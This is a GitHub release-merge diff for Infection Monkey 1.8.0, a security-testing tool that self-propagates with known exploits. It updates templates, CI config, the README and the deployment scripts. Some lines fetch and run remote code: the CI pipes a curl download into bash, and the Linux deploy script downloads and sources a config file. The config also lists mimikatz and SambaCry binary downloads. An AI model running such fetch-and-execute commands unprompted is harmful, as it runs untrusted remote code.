Merge pull request #599 from guardicore/release/1.8.0

Release/1.8.0
Changelog will be published soon-ish.
This commit is contained in:
Shay Nehmad 2020-04-27 16:39:10 +03:00 committed by GitHub
commit 9b7d7972b5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
505 changed files with 17773 additions and 11989 deletions

View File

@ -1,23 +1,29 @@
--- ---
name: Bug report name: 🐛 Bug report
about: Create a report to help us fix things! about: Create a report to help us fix things!
--- ---
**Describe the bug** <!--
Thank you for reporting a bug to make Infection Monkey better.
Please fill in as much of the template below as you're able.
-->
## Describe the bug
A clear and concise description of what the bug is. A clear and concise description of what the bug is.
**To Reproduce** ## To Reproduce
Steps to reproduce the behavior: Steps to reproduce the behavior:
1. Configure the Monkey with X settings 1. Configure the Monkey with X settings
2. Run the monkey on specific machine 2. Run the monkey on specific machine
3. See error 3. See error
**Expected behavior** ## Expected behavior
A description of what you expected to happen. A description of what you expected to happen.
**Screenshots** ## Screenshots
If applicable, add screenshots to help explain your problem. If applicable, add screenshots to help explain your problem.
**Machine version(please complete the following information):** ## Machine version (please complete the following information):
- OS: Windows or Linux - OS: Windows or Linux

View File

@ -0,0 +1,20 @@
---
name: "\U0001F680 Feature request"
about: Suggest an idea for this project
---
<!--
Thank you for suggesting an idea to make Infection Monkey better.
Please fill in as much of the template below as you're able.
-->
**Is your feature request related to a problem? Please describe.**
Please describe the problem you are trying to solve.
**Describe the solution you'd like**
Please describe the desired behavior.
**Describe alternatives you've considered**
Please describe alternative solutions or features you have considered.

8
.github/ISSUE_TEMPLATE/config.yml vendored Normal file
View File

@ -0,0 +1,8 @@
blank_issues_enabled: false
contact_links:
- name: Slack Channel
url: https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LWM0NjVmNWE2ZTMzYzAxOWJiYmMxMzU0NWU3NmUxYjcyNjk0YWY2MDkwODk4NGMyNDU4NzA4MDljOWNmZWViNDU
about: Our community Slack channel - you can ask questions or suggest things here.
- name: FAQs
url: https://www.guardicore.com/infectionmonkey/faq/
about: Frequently Asked Questions - if you have a question, see if we've already answered it!

View File

@ -1,12 +1,15 @@
# Feature / Fixes # What is this?
> Changes/Fixes the following feature Fixes #`put issue number here`.
Add any further explanations here.
## Checklist
* [ ] Have you added an explanation of what your changes do and why you'd like to include them? * [ ] Have you added an explanation of what your changes do and why you'd like to include them?
* [ ] Have you successfully tested your changes locally? * [ ] Have you successfully tested your changes locally?
* [ ] Is the TravisCI build passing?
* Example screenshot/log transcript of the feature working ## Proof that it works
If applicable, add screenshots or log transcripts of the feature working
## Changes ## Changes
- Are the commit messages enough? If not, elaborate.
-
-

BIN
.github/attack-report.png vendored Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 198 KiB

BIN
.github/map-full.png vendored

Binary file not shown.

Before

Width:  |  Height:  |  Size: 80 KiB

After

Width:  |  Height:  |  Size: 162 KiB

BIN
.github/security-report.png vendored Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 122 KiB

BIN
.github/zero-trust-report.png vendored Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 194 KiB

4
.gitmodules vendored Normal file
View File

@ -0,0 +1,4 @@
[submodule "monkey/monkey_island/cc/services/attack/attack_data"]
path = monkey/monkey_island/cc/services/attack/attack_data
url = https://github.com/guardicore/cti

View File

@ -1,18 +1,71 @@
# Infection Monkey travis.yml. See Travis documentation for information about this file structure.
group: travis_latest group: travis_latest
language: python language: python
cache: pip cache: pip
python: python:
- 2.7 - 3.7
os: linux
install: install:
#- pip install -r requirements.txt # Python
- pip install flake8 # pytest # add another testing frameworks later - pip install -r monkey/monkey_island/requirements.txt # for unit tests
- pip install flake8 pytest dlint # for next stages
- pip install coverage # for code coverage
- pip install -r monkey/infection_monkey/requirements.txt # for unit tests
before_script: before_script:
# stop the build if there are Python syntax errors or undefined names # Set the server config to `testing`. This is required for for the UTs to pass.
- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics - python monkey/monkey_island/cc/set_server_config.py testing
# exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
script: script:
- true # pytest --capture=sys # add other tests here # Check Python code
## Check syntax errors and fail the build if any are found.
- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
## Warn about linter issues.
### --exit-zero forces Flake8 to use the exit status code 0 even if there are errors, which means this will NOT fail the build.
### --count will print the total number of errors.
### --statistics Count the number of occurrences of each error/warning code and print a report.
### The output is redirected to a file.
- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics > flake8_warnings.txt
## Display the linter issues
- cat flake8_warnings.txt
## Make sure that we haven't increased the amount of warnings.
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=190
- if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
## Run unit tests
- cd monkey # This is our source dir
- python -m pytest # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path.
## Calculate Code Coverage
- coverage run -m pytest
# Check JS code. The npm install must happen AFTER the flake8 because the node_modules folder will cause a lot of errors.
- cd monkey_island/cc/ui
- npm i
- npm i -g eslint
- cd -
- cd monkey_island/cc/ui
- eslint ./src --quiet
- JS_WARNINGS_AMOUNT_UPPER_LIMIT=37
- eslint ./src --max-warnings $JS_WARNINGS_AMOUNT_UPPER_LIMIT
after_success:
# Upload code coverage results to codecov.io, see https://github.com/codecov/codecov-bash for more information
- bash <(curl -s https://codecov.io/bash)
notifications: notifications:
on_success: change slack: # Notify to slack
on_failure: change # `always` will be the setting once code changes slow down rooms:
- infectionmonkey:QaXbsx4g7tHFJW0lhtiBmoAg#ci # room: #ci
on_success: change
on_failure: always
email:
on_success: change
on_failure: always

View File

@ -1,4 +1,4 @@
# Hi there # Hi there 🐵
Thanks for your interest in making the Monkey -- and therefore, your network -- a better place! Thanks for your interest in making the Monkey -- and therefore, your network -- a better place!
@ -10,8 +10,13 @@ to reproduce. While we'll try to help anyway, focusing us will help us help you
If you want to contribute new code or fix bugs, please read the following sections. You can also contact us (the If you want to contribute new code or fix bugs, please read the following sections. You can also contact us (the
maintainers of this project) at our [Slack channel](https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LTM2ZTg0ZDlmNWNlZjQ5NDI5NTM1NWJlYTRlMGIwY2VmZGMxZDlhMTE2OTYwYmZhZjM1MGZhZjA2ZjI4MzA1NDk). maintainers of this project) at our [Slack channel](https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LTM2ZTg0ZDlmNWNlZjQ5NDI5NTM1NWJlYTRlMGIwY2VmZGMxZDlhMTE2OTYwYmZhZjM1MGZhZjA2ZjI4MzA1NDk).
## Submitting Issues
* **Do** write a detailed description of your bug and use a descriptive title.
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
## Submitting code You can look at [this issue](https://github.com/guardicore/monkey/issues/430) for an example.
## Submitting Code
The following is a *short* list of recommendations. PRs that don't match these criteria won't be closed but it'll be harder to merge the changes into the code. The following is a *short* list of recommendations. PRs that don't match these criteria won't be closed but it'll be harder to merge the changes into the code.
@ -24,18 +29,23 @@ The following is a *short* list of recommendations. PRs that don't match these c
Also, please submit PRs to the `develop` branch. Also, please submit PRs to the `develop` branch.
#### Unit tests #### Unit Tests
**Do** add unit tests if you think it fits. We place our unit tests in the same folder as the code, with the same **Do** add unit tests if you think it fits. We place our unit tests in the same folder as the code, with the same
filename, followed by the _test suffix. So for example: `somefile.py` will be tested by `somefile_test.py`. filename, followed by the _test suffix. So for example: `somefile.py` will be tested by `somefile_test.py`.
Please try to read some of the existing unit testing code, so you can see some examples. Please try to read some of the existing unit testing code, so you can see some examples.
#### Branch naming scheme #### Branches Naming Scheme
**Do** name your branches in accordance with GitFlow. The format is `ISSUE_#/BRANCH_NAME`; For example, **Do** name your branches in accordance with GitFlow. The format is `ISSUE_#/BRANCH_NAME`; For example,
`400/zero-trust-mvp` or `232/improvment/hide-linux-on-cred-maps`. `400/zero-trust-mvp` or `232/improvment/hide-linux-on-cred-maps`.
## Issues #### Continuous Integration
* **Do** write a detailed description of your bug and use a descriptive title. We use [TravisCI](https://travis-ci.com/guardicore/monkey) for automatically checking the correctness and quality of submitted
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug. pull requests. If your build fails, it might be because of one of the following reasons:
* Syntax errors.
* Failing Unit Tests.
* Too many linter warnings.
Thank you for reading this before opening an issue or a PR, you've already doing good! In any of these cases, you can look for the cause of the failure in the _job log_ in your TravisCI build.
#### Thank you for reading this before opening an issue or a PR, you're already doing good!

View File

@ -1,25 +1,40 @@
Infection Monkey # Infection Monkey
==================== [![GitHub release (latest by date)](https://img.shields.io/github/v/release/guardicore/monkey)](https://github.com/guardicore/monkey/releases)
### Data center Security Testing Tool [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey)
------------------------ [![codecov](https://codecov.io/gh/guardicore/monkey/branch/develop/graph/badge.svg)](https://codecov.io/gh/guardicore/monkey)
![GitHub stars](https://img.shields.io/github/stars/guardicore/monkey)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/guardicore/monkey)
## Data center Security Testing Tool
Welcome to the Infection Monkey! Welcome to the Infection Monkey!
The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server. The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server.
<img src=".github/map-full.png" >
<img src=".github/Security-overview.png" width="800" height="500">
The Infection Monkey is comprised of two parts: The Infection Monkey is comprised of two parts:
* Monkey - A tool which infects other machines and propagates to them
* Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center
To read more about the Monkey, visit http://infectionmonkey.com * **Monkey** - A tool which infects other machines and propagates to them.
* **Monkey Island** - A dedicated server to control and visualize the Infection Monkey's progress inside the data center.
Main Features To read more about the Monkey, visit [infectionmonkey.com](https://infectionmonkey.com).
---------------
## Screenshots
### Map
<img src=".github/map-full.png" width="800" height="600">
### Security report
<img src=".github/security-report.png" width="800" height="500">
### Zero trust report
<img src=".github/zero-trust-report.png" width="800" height="500">
### ATT&CK report
<img src=".github/attack-report.png" width="900" height="500">
## Main Features
The Infection Monkey uses the following techniques and exploits to propagate to other machines. The Infection Monkey uses the following techniques and exploits to propagate to other machines.
@ -35,23 +50,41 @@ The Infection Monkey uses the following techniques and exploits to propagate to
* Conficker * Conficker
* SambaCry * SambaCry
* Elastic Search (CVE-2015-1427) * Elastic Search (CVE-2015-1427)
* Weblogic server
* and more
Setup ## Setup
-------------------------------
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/). Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).
The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility). The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).
## Building the Monkey from source
Building the Monkey from source
-------------------------------
To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder. To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder.
If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself) If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island). and follow the instructions at the readme files under [infection_monkey](monkey/infection_monkey) and [monkey_island](monkey/monkey_island).
### Build status
| Branch | Status |
| ------ | :----: |
| Develop | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) |
| Master | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=master)](https://travis-ci.com/guardicore/monkey) |
## Tests
### Unit Tests
In order to run all of the Unit Tests, run the command `python -m pytest` in the `monkey` directory.
To get a coverage report, first make sure the `coverage` package is installed using `pip install coverage`. Run the command
`coverage run -m unittest` in the `monkey` directory and then `coverage html`. The coverage report can be found in
`htmlcov.index`.
### Blackbox tests
In order to run the Blackbox tests, refer to `envs/monkey_zoo/blackbox/README.md`.
# License
License
=======
Copyright (c) Guardicore Ltd Copyright (c) Guardicore Ltd
See the [LICENSE](LICENSE) file for license rights and limitations (GPLv3). See the [LICENSE](LICENSE) file for license rights and limitations (GPLv3).

View File

@ -1,24 +1,55 @@
# Files used to deploy development version of infection monkey # Deployment guide for a development environemnt
## Windows
Before running the script you must have git installed.<br> This guide is for you if you wish to develop for Infection Monkey. If you only want to use it, please download the relevant version from [our website](https://infectionmonkey.com).
Cd to scripts directory and use the scripts.<br>
First argument is an empty directory (script can create one) and second is branch you want to clone.
Example usages:<br>
./run_script.bat (Sets up monkey in current directory under .\infection_monkey)<br>
./run_script.bat "C:\test" (Sets up monkey in C:\test)<br>
powershell -ExecutionPolicy ByPass -Command ". .\deploy_windows.ps1; Deploy-Windows -monkey_home C:\test" (Same as above)<br>
./run_script.bat "" "master"(Sets up master branch instead of develop in current dir)
Don't forget to add python to PATH or do so while installing it via this script.<br>
## Linux ## Prerequisites
You must have root permissions, but don't run the script as root.<br> Before running the script you must have `git` installed. If you don't have `git` installed, please follow [this guide](https://git-scm.com/book/en/v2/Getting-Started-Installing-Git).
Launch deploy_linux.sh from scripts directory.<br>
First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). ## Deploy on Windows
Choose a directory where you have all the relevant permissions, for e.g. /home/your_username
Example usages:<br> Run the following command in powershell:
./deploy_linux.sh (deploys under ./infection_monkey)<br>
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)<br> ```powershell
./deploy_linux.sh "" "master" (deploys master branch in script directory)<br> Invoke-WebRequest https://raw.githubusercontent.com/guardicore/monkey/develop/deployment_scripts/deploy_windows.ps1 -OutFile deploy_windows.ps1
./deploy_linux.sh "/home/user/new" "master" (if directory "new" is not found creates it and clones master branch into it)<br> ```
This will download our deploy script. It's a good idea to read it quickly before executing it!
After downloading that script, execute it in `powershell`.
The first argument is an empty directory (script can create one). The second argument is which branch you want to clone - by default, the script will check out the `develop` branch. Some example usages:
- `.\deploy_windows.ps1` (Sets up monkey in current directory under .\infection_monkey)
- `.\deploy_windows.ps1 -monkey_home "C:\test"` (Sets up monkey in C:\test)
- `.\deploy_windows.ps1 -branch "master"` (Sets up master branch instead of develop in current dir)
You may also pass in an optional `agents=$false` parameter to disable downloading the latest agent binaries.
### Troubleshooting
- If you run into Execution Policy warnings, you can disable them by prefixing the following snippet: `powershell -ExecutionPolicy ByPass -Command "[original command here]"`
- Don't forget to add python to PATH or do so while installing it via this script.
## Deploy on Linux
Linux deployment script is meant for Ubuntu 16 and Ubuntu 18 machines.
Your user must have root permissions; however, don't run the script as root!
```sh
wget https://raw.githubusercontent.com/guardicore/monkey/develop/deployment_scripts/deploy_linux.sh
```
This will download our deploy script. It's a good idea to read it quickly before executing it!
Then execute the resulting script with your shell.
After downloading that script, execute it in a shell. The first argument should be an absolute path of an empty directory (the script will create one if doesn't exist, default is ./infection_monkey). The second parameter is the branch you want to clone (develop by default). Some example usages:
- `./deploy_linux.sh` (deploys under ./infection_monkey)
- `./deploy_linux.sh "/home/test/monkey"` (deploys under /home/test/monkey)
- `./deploy_linux.sh "" "master"` (deploys master branch in script directory)
- `./deploy_linux.sh "/home/user/new" "master"` (if directory "new" is not found creates it and clones master branch into it)
You may also pass in an optional third `false` parameter to disable downloading the latest agent binaries.

View File

@ -5,15 +5,17 @@ MONKEY_FOLDER_NAME="infection_monkey"
MONKEY_GIT_URL="https://github.com/guardicore/monkey" MONKEY_GIT_URL="https://github.com/guardicore/monkey"
# Monkey binaries # Monkey binaries
LINUX_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" LINUX_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/monkey-linux-32"
LINUX_32_BINARY_NAME="monkey-linux-32" LINUX_32_BINARY_NAME="monkey-linux-32"
LINUX_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-64" LINUX_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/monkey-linux-64"
LINUX_64_BINARY_NAME="monkey-linux-64" LINUX_64_BINARY_NAME="monkey-linux-64"
WINDOWS_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-32.exe" WINDOWS_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/monkey-windows-32.exe"
WINDOWS_32_BINARY_NAME="monkey-windows-32.exe" WINDOWS_32_BINARY_NAME="monkey-windows-32.exe"
WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe" WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/monkey-windows-64.exe"
WINDOWS_64_BINARY_NAME="monkey-windows-64.exe" WINDOWS_64_BINARY_NAME="monkey-windows-64.exe"
# Mongo url's # Other binaries for monkey
MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz" TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/traceroute64"
MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz" TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/traceroute32"
SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/sc_monkey_runner64.so"
SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/sc_monkey_runner32.so"

View File

@ -2,47 +2,48 @@
$MONKEY_FOLDER_NAME = "infection_monkey" $MONKEY_FOLDER_NAME = "infection_monkey"
# Url of public git repository that contains monkey's source code # Url of public git repository that contains monkey's source code
$MONKEY_GIT_URL = "https://github.com/guardicore/monkey" $MONKEY_GIT_URL = "https://github.com/guardicore/monkey"
$MONKEY_RELEASES_URL = $MONKEY_GIT_URL + "/releases"
$MONKEY_LATEST_VERSION = "v1.7.0"
$MONKEY_DOWNLOAD_URL = $MONKEY_RELEASES_URL + "/download/" + $MONKEY_LATEST_VERSION + "/"
# Link to the latest python download or install it manually # Link to the latest python download or install it manually
$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi" $PYTHON_URL = "https://www.python.org/ftp/python/3.7.6/python-3.7.6-amd64.exe"
# Monkey binaries # Monkey binaries
$LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" $LINUX_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "monkey-linux-32"
$LINUX_32_BINARY_PATH = "monkey-linux-32" $LINUX_32_BINARY_PATH = "monkey-linux-32"
$LINUX_64_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-64" $LINUX_64_BINARY_URL = $MONKEY_DOWNLOAD_URL + "monkey-linux-64"
$LINUX_64_BINARY_PATH = "monkey-linux-64" $LINUX_64_BINARY_PATH = "monkey-linux-64"
$WINDOWS_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-32.exe" $WINDOWS_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "monkey-windows-32.exe"
$WINDOWS_32_BINARY_PATH = "monkey-windows-32.exe" $WINDOWS_32_BINARY_PATH = "monkey-windows-32.exe"
$WINDOWS_64_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe" $WINDOWS_64_BINARY_URL = $MONKEY_DOWNLOAD_URL + "monkey-windows-64.exe"
$WINDOWS_64_BINARY_PATH = "monkey-windows-64.exe" $WINDOWS_64_BINARY_PATH = "monkey-windows-64.exe"
$SAMBA_32_BINARY_URL = "https://github.com/VakarisZ/tempBinaries/raw/master/sc_monkey_runner32.so" $SAMBA_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "sc_monkey_runner32.so"
$SAMBA_32_BINARY_NAME= "sc_monkey_runner32.so" $SAMBA_32_BINARY_NAME = "sc_monkey_runner32.so"
$SAMBA_64_BINARY_URL = "https://github.com/VakarisZ/tempBinaries/raw/master/sc_monkey_runner64.so" $SAMBA_64_BINARY_URL = $MONKEY_DOWNLOAD_URL + "sc_monkey_runner64.so"
$SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so" $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
$TRACEROUTE_64_BINARY_URL = $MONKEY_DOWNLOAD_URL + "traceroute64"
$TRACEROUTE_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "traceroute32"
# Other directories and paths ( most likely you dont need to configure) # Other directories and paths ( most likely you dont need to configure)
$MONKEY_ISLAND_DIR = "\monkey\monkey_island" $MONKEY_ISLAND_DIR = Join-Path "\monkey" -ChildPath "monkey_island"
$MONKEY_DIR = "\monkey\infection_monkey" $MONKEY_DIR = Join-Path "\monkey" -ChildPath "infection_monkey"
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner" $SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin"
$PYTHON_DLL = "C:\Windows\System32\python27.dll" $MK32_DLL = "mk32.zip"
$MK32_DLL = "mk32.dll" $MK64_DLL = "mk64.zip"
$MK64_DLL = "mk64.dll" $TEMP_PYTHON_INSTALLER = ".\python.exe"
$TEMP_PYTHON_INSTALLER = ".\python.msi"
$TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_MONGODB_ZIP = ".\mongodb.zip"
$TEMP_OPEN_SSL_ZIP = ".\openssl.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip"
$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_CPP_INSTALLER = "cpp.exe"
$TEMP_NPM_INSTALLER = "node.msi" $TEMP_NPM_INSTALLER = "node.msi"
$TEMP_PYWIN32_INSTALLER = "pywin32.exe"
$TEMP_UPX_ZIP = "upx.zip" $TEMP_UPX_ZIP = "upx.zip"
$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi" $UPX_FOLDER = "upx-3.96-win64"
$UPX_FOLDER = "upx394w"
# Other url's # Other url's
$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi" $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2012plus-v4.2-latest.zip"
$MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/openssl-1.0.2u-x64_86-win64.zip"
$OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip"
$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572"
$NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $NPM_URL = "https://nodejs.org/dist/v12.14.1/node-v12.14.1-x64.msi"
$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip"
$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip"
$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll" $UPX_URL = "https://github.com/upx/upx/releases/download/v3.96/upx-3.96-win64.zip"
$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll"

252
deployment_scripts/deploy_linux.sh Normal file → Executable file
View File

@ -1,139 +1,223 @@
#!/bin/bash #!/bin/bash
source config
exists() {
command -v "$1" >/dev/null 2>&1
}
is_root() {
return $(id -u)
}
has_sudo() {
# 0 true, 1 false
timeout 1 sudo id && return 0 || return 1
}
handle_error() {
echo "Fix the errors above and rerun the script"
exit 1
}
log_message() {
echo -e "\n\n"
echo -e "DEPLOYMENT SCRIPT: $1"
}
config_branch=${2:-"develop"}
config_url="https://raw.githubusercontent.com/guardicore/monkey/${config_branch}/deployment_scripts/config"
if (! exists curl) && (! exists wget); then
log_message 'Your system does not have curl or wget, exiting'
exit 1
fi
file=$(mktemp)
# shellcheck disable=SC2086
if exists wget; then
# shellcheck disable=SC2086
wget --output-document=$file "$config_url"
else
# shellcheck disable=SC2086
curl -s -o $file "$config_url"
fi
log_message "downloaded configuration"
# shellcheck source=deployment_scripts/config
# shellcheck disable=SC2086
source $file
log_message "loaded configuration"
# shellcheck disable=SC2086
# rm $file
# Setup monkey either in dir required or current dir # Setup monkey either in dir required or current dir
monkey_home=${1:-`pwd`} monkey_home=${1:-$(pwd)}
if [[ $monkey_home == `pwd` ]]; then if [[ $monkey_home == $(pwd) ]]; then
monkey_home="$monkey_home/$MONKEY_FOLDER_NAME" monkey_home="$monkey_home/$MONKEY_FOLDER_NAME"
fi fi
# We can set main paths after we know the home dir # We can set main paths after we know the home dir
ISLAND_PATH="$monkey_home/monkey/monkey_island" ISLAND_PATH="$monkey_home/monkey/monkey_island"
MONKEY_COMMON_PATH="$monkey_home/monkey/common/"
MONGO_PATH="$ISLAND_PATH/bin/mongodb" MONGO_PATH="$ISLAND_PATH/bin/mongodb"
MONGO_BIN_PATH="$MONGO_PATH/bin"
ISLAND_DB_PATH="$ISLAND_PATH/db"
ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries"
INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey"
MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin"
handle_error () { if is_root; then
echo "Fix the errors above and rerun the script" log_message "Please don't run this script as root"
exit 1 exit 1
} fi
log_message () { HAS_SUDO=$(has_sudo)
echo -e "\n\n-------------------------------------------" if [[ ! $HAS_SUDO ]]; then
echo -e "DEPLOYMENT SCRIPT: $1" log_message "You need root permissions for some of this script operations. Quiting."
echo -e "-------------------------------------------\n" exit 1
}
sudo -v
if [[ $? != 0 ]]; then
echo "You need root permissions for some of this script operations. Quiting."
exit 1
fi fi
if [[ ! -d ${monkey_home} ]]; then if [[ ! -d ${monkey_home} ]]; then
mkdir -p ${monkey_home} mkdir -p "${monkey_home}"
fi fi
git --version &>/dev/null if ! exists git; then
git_available=$? log_message "Please install git and re-run this script"
if [[ ${git_available} != 0 ]]; then exit 1
echo "Please install git and re-run this script"
exit 1
fi fi
log_message "Cloning files from git" log_message "Cloning files from git"
branch=${2:-"develop"} branch=${2:-"develop"}
if [[ ! -d "$monkey_home/monkey" ]]; then # If not already cloned if [[ ! -d "$monkey_home/monkey" ]]; then # If not already cloned
git clone --single-branch -b $branch ${MONKEY_GIT_URL} ${monkey_home} 2>&1 || handle_error git clone --single-branch --recurse-submodules -b "$branch" "${MONKEY_GIT_URL}" "${monkey_home}" 2>&1 || handle_error
chmod 774 -R ${monkey_home} chmod 774 -R "${monkey_home}"
fi fi
# Create folders # Create folders
log_message "Creating island dirs under $ISLAND_PATH" log_message "Creating island dirs under $ISLAND_PATH"
mkdir -p ${MONGO_BIN_PATH} mkdir -p "${MONGO_PATH}" || handle_error
mkdir -p ${ISLAND_DB_PATH} mkdir -p "${ISLAND_BINARIES_PATH}" || handle_error
mkdir -p ${ISLAND_BINARIES_PATH} || handle_error
python_version=`python --version 2>&1` # Detecting command that calls python 3.7
if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then python_cmd=""
echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." if [[ $(python --version 2>&1) == *"Python 3.7"* ]]; then
exit 1 python_cmd="python"
fi
if [[ $(python37 --version 2>&1) == *"Python 3.7"* ]]; then
python_cmd="python37"
fi
if [[ $(python3.7 --version 2>&1) == *"Python 3.7"* ]]; then
python_cmd="python3.7"
fi fi
log_message "Updating package list" if [[ ${python_cmd} == "" ]]; then
sudo apt-get update log_message "Python 3.7 command not found. Installing python 3.7."
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt-get update
sudo apt install python3.7 python3.7-dev
log_message "Python 3.7 is now available with command 'python3.7'."
python_cmd="python3.7"
fi
log_message "Installing pip" log_message "Installing build-essential"
sudo apt-get install python-pip sudo apt install build-essential
log_message "Installing or updating pip"
# shellcheck disable=SC2086
pip_url=https://bootstrap.pypa.io/get-pip.py
if exists wget; then
wget --output-document=get-pip.py $pip_url
else
curl $pip_url -o get-pip.py
fi
${python_cmd} get-pip.py
rm get-pip.py
log_message "Installing island requirements" log_message "Installing island requirements"
requirements="$ISLAND_PATH/requirements.txt" requirements_island="$ISLAND_PATH/requirements.txt"
python -m pip install --user -r ${requirements} || handle_error ${python_cmd} -m pip install -r "${requirements_island}" --user --upgrade || handle_error
log_message "Installing monkey requirements"
